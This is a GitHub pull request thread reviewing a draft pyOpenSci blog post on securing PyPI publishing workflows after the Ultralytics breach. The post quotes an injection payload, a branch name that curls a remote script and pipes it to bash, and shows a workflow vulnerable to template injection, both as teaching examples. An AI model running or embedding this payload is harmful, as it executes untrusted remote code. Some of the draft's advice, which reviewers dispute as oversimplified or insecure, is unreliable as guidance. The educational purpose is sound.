feat(blog): blog post--lessons learned on publish security #538

Open · wants to merge 15 commits into base: main
307 changes: 307 additions & 0 deletions _posts/2024-12-13-python-packaging-security.md
@@ -0,0 +1,307 @@
---
layout: single
title: "Staying Secure: Best Practices for Publishing Python Packages to PyPI"
excerpt: "blah"
author: "Leah Wasser"
permalink: /blog/python-packaging-security-publish-pypi.html
header:
overlay_image: images/headers/pyopensci-inessa.png
overlay_filter: rgba(20, 13, 36, 0.3)
categories:
- blog-post
- community
classes: wide
toc: true
comments: true
last_modified: 2024-12-13
---

## Is your PyPI publication workflow secure?

The recent Python package breach [involving Ultralytics](https://blog.pypi.org/posts/2024-12-11-ultralytics-attack-analysis/) has highlighted the need for secure PyPI publishing workflows. Attackers exploited a GitHub Actions workflow triggered by the `pull_request_target` event to inject malicious code, which was then published to PyPI. Users who downloaded the package unknowingly allowed their machines to be hijacked for Bitcoin mining.

**Reviewer:**

> a GitHub workflow (`pull_request_target`)

`pull_request_target` is not a workflow, it's one of the events that may trigger a workflow run. A workflow may “subscribe” to different events like `push` and `pull_request`; this is just another event type with elevated privileges in its security context.

> unknowingly allowed their machines to be hijacked for Bitcoin mining.

Not only that, but they also did that in Google Colab, which got their accounts banned pretty swiftly...
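
A minimal illustration of that distinction, as a sketch (the comments are ours, not from the Ultralytics workflow):

```yaml
# `pull_request_target` is an event a workflow can subscribe to, not a
# workflow itself. Unlike `pull_request`, it runs in the base repository's
# privileged security context (secrets available), which is what makes it
# risky in combination with untrusted code from forks.
on:
  push:
  pull_request:          # runs unprivileged for fork PRs
  pull_request_target:   # runs privileged; handle with extreme care
```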

**Author (lwasser):**

OOOOH no way. i missed the Google Colab part!! that's a pretty bold move for a hacker? maybe they were new hackers?

**Reviewer:**

See googlecolab/colabtools#4979.

It was unwitting end users who installed the hacked package on their Colab accounts, and the Google automation then suspended their accounts:

> Connection failed
> This account has been blocked from accessing Colab runtimes due to suspected abusive activity. This does not impact access to other Google products. If you believe this has been done in error, review the usage limitations and file an appeal.

Google was pretty quick in restoring accounts, but it happened to a lot of accounts: googlecolab/colabtools#4979 (comment)


> Hackers slipped malicious code into a Python package and used other people’s computers to mine Bitcoin without permission. Yikes!

While unsettling, there’s a silver lining: the PyPI security team had already addressed most of the issues that caused this breach.


{% include pyos-blockquote.html quote="Because the Ultralytics project was using Trusted Publishing and the PyPA’s publishing GitHub Action: PyPI staff, volunteers, and security researchers were able to dig into how maliciously injected software was able to make its way into the package." author="Seth Larson, PSF Security Expert" class="highlight magenta" %}

This incident underscores the importance of understanding Python packaging security best practices.

In this blog post, we'll cover the lessons learned that you can apply - TODAY - to your own Python packaging workflows!

<div class="notice" markdown="1">
## TL;DR Takeaways

The Ultralytics breach is a wake-up call for all maintainers: secure your workflows now to protect your users and the Python ecosystem. Start with these key actions:

### 🔐 Secure your workflows 🔐
- 🚫 Avoid risky trigger events in GitHub Actions like `pull_request_target`, and consider publish workflows that are triggered by a GitHub release rather than a pull request merge.

**Reviewer:**

It's not immediately clear what makes a workflow “release-based”. I haven't read past this point at the time of writing this comment, though.
Rephrase, perhaps?

**Author (lwasser):**

good point - fixed!!

  • 🚫 Avoid risky trigger events in GitHub actions like pull_request_target
  • Consider using publish workflows on GitHub that are triggered by a GitHub release rather than a pull request merge.

- ♻️ Don’t cache dependencies in your publish workflows to prevent tampering.

**Reviewer:**

That's probably an oversimplification. Not caching the deps may as well lead to something like this if the transitive deps are unpinned and get updated in an uncontrolled manner. The problem was that the cache was poisoned in a job with a security context that had high privileges, and then another job picked it up, effectively reusing what that first one “pinned” in the installed deps.

But if there's no cache, a compromised transitive dependency can be downloaded from PyPI, resulting in the same problem.

Security exists in context and not in isolation. It should come from a place of understanding how different bits fit together.

That said, I wouldn't make a call of whether using caching or not will save us all. The problem was that it was possible to compromise the cache that ended up being used.

I think it's possible to use cache securely by having separate cache keys unique to the dist building job. So caches for building the dists and testing them would not leak into each other. That's the real fix for cache.

Another side of this is the supply chain problem, which cache ended up being a part of in this instance. But as I mentioned earlier, the supply chain could be compromised differently, without cache being a factor. The solution to this is pinning your dependencies. This means recording every single version number for every single transitive dependency there is. One of the low-level tools to use for this is pip-tools, in the context of `pip install` (until we have PEP 751, that is). Non-pip installers have different mechanisms. With pip, you can use `pip install -r requirements.in -c constraints.txt`, where `requirements.in` would contain a direct and unrestricted dependency list, and `constraints.txt` would set the entire tree to exact versions. A complete solution is usually an integration of different aspects through multiple tools (or a "one-tool-to-rule-them-all" which some projects aim to become). I've been taking this to extremes with "DIY lock files" in https://github.com/webknjaz/ep2024-multilock-toy-template / https://github.com/ansible/awx-plugins/tree/2c2b22c/dependencies/lock-files.

Additionally, there's `--require-hashes`, which also records every single dist file hash, not just the version (this is not compatible with `-c`, though, due to a bug in pip).

To summarize, the solution here is to be in control of your deps, make sure their updates are transparent and controllable on all the levels, and to know what influences them… Out of the context, disallowing caching is a band-aid at best. But it may be harmful in that it would cultivate a false sense of security.
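
A minimal sketch of the constraints-file approach described above, expressed as a workflow step (the file names `requirements.in` and `constraints.txt` are illustrative):

```yaml
steps:
  - name: Install fully pinned dependencies
    # requirements.in lists only direct, unrestricted dependencies.
    # constraints.txt pins the entire transitive tree to exact versions;
    # it is generated ahead of time (e.g. with
    # `pip-compile requirements.in --output-file constraints.txt`) and
    # committed, so every dependency update is visible in review.
    run: python -m pip install -r requirements.in -c constraints.txt
```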

**Author (lwasser):**

ok. This is super helpful. I could remove the caching part altogether, given so many moving pieces; caching seems more nuanced than just locking down the workflow itself with better triggers and tighter permissions. But I also have a question about the dependencies. Because it is my understanding and experience that pinning all deps can also be highly problematic for users. For instance, if you have an environment with many different packages and try installing a package with pinned deps, that could lead to significant user issues.

Unless we're just talking about deps in the workflow itself, such as hatch, pypa/build, etc.

web apps make sense to pin but i can't quite wrap my head around pinning deps for a package. Could you please help me understand? And do you agree - maybe for more beginner users we just drop caching altogether as a topic?

- If you reference branches in a pull request, clean or sanitize branch names in your workflow.

**Author (lwasser):**

Great suggestions!! I may add these links lower down in the post at the end, so the takeaways are just text... but I'll definitely include them. This is what I have now:

  • If you reference branches in a pull request, clean or sanitize branch names in your workflow.
  • Consider using zizmor to check your GitHub workflows for security vulnerabilities!

i haven't used zizmor yet but i saw a package that Hugo maintains uses it so i may try it out with stravalib and pyosmeta!!


### Lock down GitHub repo access
- 🔒 Restrict repository access to essential maintainers only.

**Reviewer:**

While the principle of least privilege is good to follow, this specific breach wasn't because somebody had direct access to the repo (the attack wouldn't need to be as sophisticated), but because the security context used for PRs from arbitrary forks was set to trusted without the necessary precautions.

- ✅ Add automated checks to ensure releases are authorized and secure.

**Reviewer:**

I think this is mostly about setting an environment in the job and making sure that environment has required reviewers in the repo settings.

**Author (lwasser):**

Looking at the blog posts, it seemed like the hackers somehow got direct access to that repo. Did i read that wrong?


### Strengthen PyPI security
- 🔑 Set up Trusted Publisher for tokenless authentication with PyPI.
- 📱 Enable 2FA for your PyPI account and store recovery codes securely.

**Reviewer:**

2FA has been required for any uploads to PyPI since this year. There's no way around it anymore. That said, long-lived and over-scoped API keys may leak and should be rotated periodically. It's much easier to use Trusted Publishing instead — it uses short-lived tokens every time; they expire 15 minutes after creation and one doesn't need to do a thing to revoke them.

**Author (lwasser):**

Ok, I hear you. I've added this:

  • Delete old GitHub tokens that you are no longer using, and refresh existing tokens that you need periodically.

I'll likely remove 2FA altogether, given it's required. I doubt most users understand why making tokens infinitely valid is bad!


These steps will significantly reduce risks to your packages, contributors, and the broader Python ecosystem. Don’t wait—start securing your workflows today.
</div>


## A call to action if you are publishing to PyPI using GitHub actions

What's important for us is that this event highlights the need for our ecosystem to follow and understand secure PyPI publishing practices and carefully monitor workflows. And the good news here is that if you are already publishing to PyPI using a GitHub action, there are things you can do RIGHT NOW to ensure your build is more secure.

**Reviewer:**

Suggested change ("a GitHub action" → "the GitHub action"):

> What's important for us is that this event highlights the need for our ecosystem to follow and understand secure PyPI publishing practices and carefully monitor workflows. And the good news here is that if you are already publishing to PyPI using the GitHub action, there are things you can do RIGHT NOW to ensure your build is more secure.

You meant pypi-publish, right? Or did you mean GitHub Actions CI/CD as an ecosystem? Or a GitHub Actions Workflow?

**Author (lwasser):**

here, I'm referring to GitHub actions in general but our examples do use the pypa action. But you are making a good point.

i'll come back to this comment and will make sure that point is super clear in the text.


For this post, we will use [this workflow that pyOpenSci has set up](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml), which was reviewed and developed by a PyPI maintainer and several core pyOpenSci community members with significant knowledge of best practices for publishing to PyPI.

Below are actionable steps you can take to enhance security when publishing Python packages to PyPI using GitHub actions.


## 1. Avoid `pull_request_target` and consider release-based workflows

The [`pull_request_target`](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target) event in GitHub Actions that Ultralytics used allows workflows to run with elevated permissions in the context of the base branch, even when triggered by changes from a fork. Thus, when used as the trigger for a workflow that pushes releases to PyPI, it leaves that workflow vulnerable.

Instead, consider adopting a **release-based workflow**:

- Trigger publication workflows only on versioned releases.
- Ensure workflows related to publishing are explicitly scoped to `release` events or tagged commits.

Notice in our workflow below that we use a `release` trigger to avoid these risks. While we also have a `push` trigger, it never triggers a publication to PyPI.


```yaml
name: Publish to PyPI
on:
  # By using release - only people with admin access to make releases to our repo can trigger the push to PyPI
  release:
    types: [published]
  push:
    branches:
      - main
```

In the example above, the push trigger is only used to test that the package distribution files can be built. To ensure that a package is only ever published on a release, we include a conditional in the publish-to-PyPI step:

```yaml
- name: Publish package to PyPI
  # Only publish to real PyPI on release
  if: github.event_name == 'release'
```

This approach ensures that the publishing step is tightly controlled, reducing the risk of malicious activity in your workflow.

## 2. Don’t cache package dependencies in your publish step

Caching dependencies involves storing them to be reused in future workflow runs. This approach saves time, as GitHub doesn’t need to redownload all dependencies each time the workflow runs.

TODO: create graphic about reusing dependencies

However, caching can also allow attackers to tamper with cached artifacts, such as your package's dependencies. If that happens, the workflow may pull compromised versions from the cache during the next run.

**Takeaway:** Don’t cache dependencies in your Python package publishing workflow. Always download fresh dependencies to ensure you’re using the latest secure versions of any packages your project depends on.

Below is an example of a build that caches dependencies.

```yaml
name: Build and Test

on:
  push:
    branches:
      - main
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      # Step 1: Check out the repository
      - name: Check out repository
        uses: actions/checkout@v3

      # Step 2: Set up Python
      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.12'

      # Step 3: Cache dependencies
      - name: Cache dependencies
        uses: actions/cache@v3
        with:
          path: ~/.cache/pip
          key: ${{ runner.os }}-pip-${{ hashFiles('**/requirements.txt') }}
          restore-keys: |
            ${{ runner.os }}-pip-

      # Step 4: Install dependencies
      - name: Install dependencies
        run: pip install -r requirements.txt

      # Step 5: Publish to PyPI
      ...
```

**Author (lwasser):**

This is not tested and could be wrong.

**Reviewer:**

This is one of the uses, but oftentimes building is performed by pypa/build, so it'd be just `pip install build` and not multiple direct deps as one might expect from a requirements.txt file. So the example seems a bit unrealistic, except for some untypical projects with surprising build automation required.

**Author (lwasser):**

oh, right, good point. What is a good example of caching dependencies (other than what we saw with Ultralytics)? I use caching when i'm publishing.

we pip install hatch and use hatch build

What do you think about removing the example and just telling people that if they do cache dependencies for any reason, don't do it when the build is for publishing?

for instance, doing it for a website build could be ok if it's a preview, etc. vs publishing a package?

**Reviewer:**

This example shows installing some abstract deps but does not demonstrate using them (as in, running `python -Im build`).

**Reviewer:**

NEVER EVER build in the same job as publishing. This is an insecure practice. I had to recently spell it out @ https://github.com/marketplace/actions/pypi-publish#Non-goals.

One of the reasons (probably the most important one in the context of this document) is that Trusted Publishing requires one to increase the privileges of the publishing job, giving it access to OIDC. This privilege must not be shared with transitive build dependencies. Such a privilege escalation may allow a malicious actor to impersonate your workflow in systems beyond PyPI (but it also increases the poisoning surface for the dists published on PyPI).

Ultimately, the only workflow shape I'm willing to call supported is documented @ https://packaging.python.org/en/latest/guides/publishing-package-distribution-releases-using-github-actions-ci-cd-workflows/.

**Author (lwasser):**

i will add a link to that packaging guide. And i see why this example may direct users incorrectly. in fact, i remember you telling me this last year when we were working on pyosMeta to update that build!
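
To make the "separate jobs" point concrete, here is a minimal sketch of the build/publish split documented in the PyPA guide linked above (the artifact name is illustrative, not pyOpenSci's exact workflow):

```yaml
jobs:
  build:
    # Unprivileged job: builds the dists and hands them off as an artifact.
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build sdist and wheel
        run: pipx run build
      - uses: actions/upload-artifact@v4
        with:
          name: python-package-distributions
          path: dist/

  publish:
    # Privileged job: the OIDC permission lives here and nowhere else,
    # so build dependencies never see it.
    needs: build
    runs-on: ubuntu-latest
    environment: pypi
    permissions:
      id-token: write  # required for Trusted Publishing
    steps:
      - uses: actions/download-artifact@v4
        with:
          name: python-package-distributions
          path: dist/
      - name: Publish to PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
```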

## 4. Use Trusted Publisher for PyPI

If you only [publish locally to PyPI using the command line](https://www.pyopensci.org/python-package-guide/tutorials/publish-pypi.html), you need to use a PyPI token. However, if you’re using GitHub Actions to automate your publishing process, setting up **Trusted Publisher** is a more secure option.

**Reviewer:**

IIRC @woodruffw was against claiming that TP is more secure, so we settled on saying that it's “as secure” but is more convenient in many regards in the README of pypi-publish.

**Author (lwasser):**

oh. that's different from my understanding of trusted publishing. I thought that TP provides a secure "pipeline" between the workflow and PyPI vs. a token that, I suppose, provides access to PyPI but doesn't necessarily directly connect to the workflow (i.e., you can specify a specific environment and workflow file with a trusted publisher).

This statement challenges my understanding of trusted publisher. @woodruffw IF you happen to have a moment to clarify that would be super helpful.

**Reviewer:**

TP is more secure in that the tokens are short-lived compared to perpetual API tokens.

And it seems like the hackers got hold of forgotten API tokens in the repo to be able to make the second pair of releases in this case.


A Trusted Publisher setup creates a secure "pipeline" between PyPI and your GitHub repository because:

**Reviewer:**

Personally, I like calling it a “trust link”. Perhaps, @woodruffw would have opinions on the wordings/metaphors here.

**Author (lwasser):**

I like the pipe idea as it's a visual people can understand even if it's not perfect. An isolated pipe or channel where files (sdist, wheel) can "travel" and be verified between GitHub and PyPI. 🤷🏻‍♀️ maybe there is a better visual but i want to help people understand why this is a good way to design a build / publish workflow.

I want to create a graphic to help people understand this, as I think some of these important concepts get lost because it's all so technical!

But i say that knowing that you and others are experts - i'm just trying to simplify so more people can apply some of these things!

- PyPI is allowed to authenticate your uploads directly, so no additional configuration is required.

**Reviewer:**

Not builds, but uploads. We make “publish” attestations, as the action cannot know how the dist it sends over was actually built. It should be built in a separate job. But theoretically could be built elsewhere and downloaded from S3 or wherever.

**Author (lwasser):**

Fixed!

- It restricts publishing to specific workflows and environments defined in your repository.

**Reviewer:**

Technically, the environment is attached to a job in a workflow. This is the information PyPI would receive when looking up the trust link. Environments, however, can also be additionally configured in repository settings on GitHub. The recommended environment name is pypi. And the recommended configuration is having required reviewers (which would pause said job on GH, requiring a human to click the button).

**Author (lwasser):**

@webknjaz I have not set this up myself and just noticed this feature after reading your comment. thank you. I really don't think people know about this stuff.

TODO: I'll add a small note about how to do that in the post with a screenshot of what the interface looks like.


This setup eliminates the need to store sensitive tokens as GitHub secrets, significantly reducing the risk of token theft or unauthorized publication.

**Reviewer:**

I don't fully agree with that note on unauthorized publication. Unauthorized publication can be prevented by controlling the trigger of the release process, or by setting up required reviewers in the environment used in the publishing job (usually called pypi) — this would prevent said job from even starting until a trusted human being clicks a button on GH. Recording the environment name on the PyPI side, though, allows restricting the “identity” of the workflow+repo+env that is to be considered “trusted”. But this only works on the authentication level between PyPI and GH, not between GH and the human, which is what you also want to secure.

**Author (lwasser):**

ok, I am still working through your comments, but after I plan to reread the entire thing, and i'll reframe it. concepts:

  1. trusted publisher is a great way to go - not necessarily BETTER than tokens. Perhaps more streamlined and simpler to set up. I think we just suggest people do that. it eliminates GitHub secrets AND it eliminates needing to set up a PyPI project FIRST using a user-scoped token (because the project doesn't exist on PyPI yet).

People will forget the step of updating their token to be project-level scope. So a trusted publisher, in my mind, is less risky for a user because it's simpler.

  2. For your build workflows, use environments that are secured and controlled by trusted humans -- (I can provide screenshots of how to set that up). This means that a publish workflow won't run until someone with access to the repo physically OKs the build.

maybe there is a graphic here to simplify and help people understand what you wrote above?

gh + human authorization
github + PyPI authorization

These are two different but related and important concepts. And they are high-level. like if people need to remember 2 things - these are the things.


### How to get started

[PyPI provides a great guide to getting started with Trusted Publisher](https://docs.pypi.org/trusted-publishers/adding-a-publisher/).

**Reviewer:**

cc @woodruffw apparently we forgot to update the screenshots in the warehouse doc to show pypi as the environment name.

**Author (lwasser):**

Oops! I can open an issue if that is helpful in warehouse?


The basic steps associated with Trusted Publisher are:
1. Go to your PyPI account and add a trusted publisher workflow to your account.
2. Fill out a form that looks like the one below. Notice that it asks for your workflow name, environment (strongly recommended), and package name.

**Reviewer:**

Maybe, don't mention that the environment is optional if this post is focused on maximizing security.

**Author (lwasser):**

good point!! changed to (they will see optional in the image!)

environment (STRONGLY recommended)

3. Update your GitHub action workflow to reference the Trusted Publisher configuration.

<figure>
<picture>
<source srcset="/images/python-packaging/trusted-publisher-form.webp" type="image/webp">
<img src="/images/python-packaging/trusted-publisher-form.webp" alt="PyPI Trusted Publisher form example showing settings for linking a GitHub repository with PyPI for secure publishing." loading="lazy">
</picture>
<figcaption>
Example of the PyPI Trusted Publisher form, used to securely link a GitHub repository with PyPI for publishing Python packages. Trusted Publisher reduces the risk of token theft and improves overall security.
</figcaption>
</figure>
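
For step 3, the workflow side of the trust link boils down to two keys on the publish job. Here is a hedged sketch (the environment name `pypi` is assumed to match what you entered in the form above):

```yaml
publish:
  runs-on: ubuntu-latest
  environment: pypi    # must match the environment named on the PyPI form
  permissions:
    id-token: write    # lets PyPI verify the job via OIDC; no token secret needed
  steps:
    - name: Publish to PyPI
      # The action uses Trusted Publishing automatically when OIDC is available.
      uses: pypa/gh-action-pypi-publish@release/v1
```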

You can see how to set up GitHub Actions securely in our own [PyPI publishing GitHub workflow](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml), which follows the Trusted Publisher approach.

**Note:** Trusted Publisher workflows aren't limited to GitHub: [GitLab CI/CD and other platforms are supported](https://docs.pypi.org/trusted-publishers/adding-a-publisher/#gitlab-cicd) as well.

**Reviewer:**

In the doc you already linked, there's an example for GitLab as well: https://docs.pypi.org/trusted-publishers/adding-a-publisher/#gitlab-cicd. There are 4 platforms that support this mechanism already, and I saw some Bitbucket folks asking around whether they can integrate.

**Author (lwasser):**

fixed the breakout and added that link!! I somehow read that GitLab support wasn't available yet, but obviously, I wasn't looking in the right place! thanks!

{: .notice }

## 5. Create a dedicated environment for publish actions

Use isolated environments in combination with Trusted Publisher in your GitHub workflow to publish to PyPI.
Isolated environments ensure your publishing process remains secure even if other parts of your CI pipeline are compromised.

If you look at the pyosMeta workflow, notice that we have an [environment called `pypi`](https://github.com/pyOpenSci/pyosMeta/blob/main/.github/workflows/publish-pypi.yml#L57) that is used for trusted publishing. By setting this up, we have created a direct pipeline between this workflow and PyPI via the `pypi` environment and the Trusted Publisher setup, which references the workflow file's name.

```yaml
publish:
  name: >-
    Publish Python 🐍 distribution 📦 to PyPI
  if: github.repository_owner == 'pyopensci'
  needs:
    - build
  runs-on: ubuntu-latest
  environment:
    name: pypi
    url: https://pypi.org/p/pyosmeta
```

**Reviewer:**

I started using the exact repository ID some time ago. This is more accurate and would survive renames and transfers:

Suggested change: `if: github.repository_owner == 'pyopensci'` → `if: github.repository_id == 174412809`

(looked up @ https://api.github.com/repos/pyOpenSci/pyopensci.github.io)

If you want to check for the org, you could use the org ID. Org names are mutable, and if the org gets renamed for whatever reason (it might be a user account that hosts a repo in some cases), this check would break.

**Author (lwasser):**

oh wow - I've always used the username as the conditional value. The only challenging piece here for users is they'd have to use the API to get that repo ID value. I don't see a clear way to get it from the GitHub GUI. we could make a note about an owner name being mutable, however, and provide the command to find the ID (it requires a token i think?).

**Reviewer:**

I'd just stick with the org/username, it's much more readable and transparent.

Org renames/transfers are pretty rare. And you'd notice the problem right away after the first deploy, and it's an easy fix.

## 6. Sanitize branch names in your workflow before using them!

One of the critical issues in the Ultralytics breach was that attackers crafted a [**malicious branch name containing a shell script**](https://github.com/ultralytics/ultralytics/pull/18020) 🤯. This script executed within the GitHub Action workflow because the branch name was directly referenced using `github.ref`.

When `github.ref` is used without sanitization, malicious content embedded in branch names can be executed. This is known as a **template injection**:

{% include pyos-blockquote.html quote="...is a classic GitHub Actions template injection: the expansion of `github.head_ref || github.ref` is injected directly into the shell’s context, with no quoting or interpolation.." author="https://blog.yossarian.net/2024/12/06/zizmor-ultralytics-injection" class="highlight magenta" %}

Because the branch name wasn’t sanitized, it was treated as a shell command and executed with full permissions. Yikes!


### Problem: a workflow that references the branch name and could be manipulated

Below is an example of a potentially vulnerable packaging workflow. If the branch name contains malicious content, this workflow could execute harmful commands:

```yaml
jobs:
  example-job:
    runs-on: ubuntu-latest
    steps:
      - name: Run a script
        run: |
          # The ${{ }} expression below is expanded into the script text
          # before the shell runs, so a crafted branch name becomes code.
          echo "Running script for branch: ${{ github.ref }}"
```

### Solution: Sanitize the Branch Name

To fix this, sanitize or clean the branch name before using it in your workflows. A small Bash cleanup step removes unexpected or unsafe characters.

```yaml
jobs:
  example-job:
    runs-on: ubuntu-latest
    steps:
      - name: Sanitize branch name
        run: |
          SAFE_BRANCH=$(echo $GITHUB_REF | sed 's/[^a-zA-Z0-9_\-\/]//g')
          echo "Sanitized branch name: $SAFE_BRANCH"
          echo "Running script for branch: $SAFE_BRANCH"
```

<div class="notice" markdown="1">
How cleaning the branch name works:

1. `echo $GITHUB_REF`: outputs the branch name.
2. `sed 's/[^a-zA-Z0-9_\-\/]//g'`: removes any characters that are not letters, numbers, dashes, underscores, or slashes, ensuring the branch name is safe.

Try it: test how sanitization works by running the commands below in your shell. The malicious branch name looked like this:

`$({curl,-sSfL,raw.githubusercontent.com/test/test/123456d8daa0b26ae0c221aa4a8c20834c4dbfef2a9a14/dummyfile.sh} | bash)`


```bash
# Input string
input='$({curl,-sSfL,raw.githubusercontent.com/test/test/123456d8daa0b26ae0c221aa4a8c20834c4dbfef2a9a14/dummyfile.sh} | bash)'

# Sanitization step
sanitized=$(echo "$input" | sed 's/[\$\{\}\|\(\)]//g')

# Output the sanitized string
echo "Original: $input"
echo "Sanitized: $sanitized"
```

This strips out any characters that can be used to call shell commands.

</div>

The good news here is that if you use a release-based workflow as discussed earlier, then you don't have to worry about branch names. And yes, you can always make a release from a different branch!

**Author (lwasser):**

Add: a few sentences on

delete old tokens and secrets containing pypi tokens... this is easy for people to do and good for them to know about.

Restricting publish workflows to tagged releases significantly reduces the risk of such attacks.


## GitHub & PyPI security tips

In addition to securing your workflows, lock down your accounts and repositories:

- **Enable 2FA (2-factor authentication)** for both PyPI and GitHub to prevent unauthorized access. Store recovery codes securely (e.g., in a password manager).
- **Revoke old tokens**: If you've previously created PyPI API tokens or GitHub secrets, delete any unused or outdated ones.
- **Restrict repository access**: Limit write access to a trusted subset of maintainers. Most contributors don’t need direct write access, which reduces security risks.

## Learn More

pyOpenSci follows best practices for PyPI publishing using our custom GitHub Actions workflow. Check out our tutorial on Python packaging here:
👉 [pyOpenSci Packaging Tutorial](https://www.pyopensci.org/python-package-guide/package-structure-code/python-package-structure.html)
👉 [Join our Discourse](https://pyopensci.discourse.group/)

<div class="notice" markdown="1">
## Get involved with pyOpenSci

* Keep an eye on our [events page](/events.html) for upcoming training events.

Follow us on social platforms:

* [<i class="fa-brands fa-discourse"></i> Discourse](https://pyopensci.discourse.group/)
* [<i class="fa-brands fa-mastodon"></i> Mastodon](https://fosstodon.org/@pyopensci)
* [<i class="fa-solid fa-cloud"></i> Bluesky](https://bsky.app/profile/pyopensci.bsky.social)

**Reviewer:**

Pro tip: consider updating the Bluesky username to pyopensci.org. This can be configured and verified in like 3 minutes (through either DNS or a .well-known document on the website), and it adds credibility to the account. You can create a repository in the org, call it .well-known, and add a file with the account DID as follows: webknjaz/.well-known@5a3c310. Just don't forget to enable Pages in the repo settings before clicking Verify.

**Author (lwasser):**

WOAH!! i never knew about this for bluesky!
thank you for this tip - and for all of the thoughtful feedback. i'm going to work on this some more tomorrow!

* [<i class="fa-brands fa-linkedin"></i> LinkedIn](https://www.linkedin.com/company/pyopensci)
* [<i class="fa-brands fa-github"></i> GitHub](https://github.com/pyOpenSci)

If you are on LinkedIn, you should [subscribe to our newsletter, too](https://www.linkedin.com/newsletters/7179551305344933888/?displayConfirmation=true).
</div>

**Reviewer:**

Please, replace this screenshot with one having `pypi` typed into the last field. `release` is misleading — we've updated it in many places in the PyPI docs already, and on the website form, in the placeholder. But it looks like I missed the screenshots.
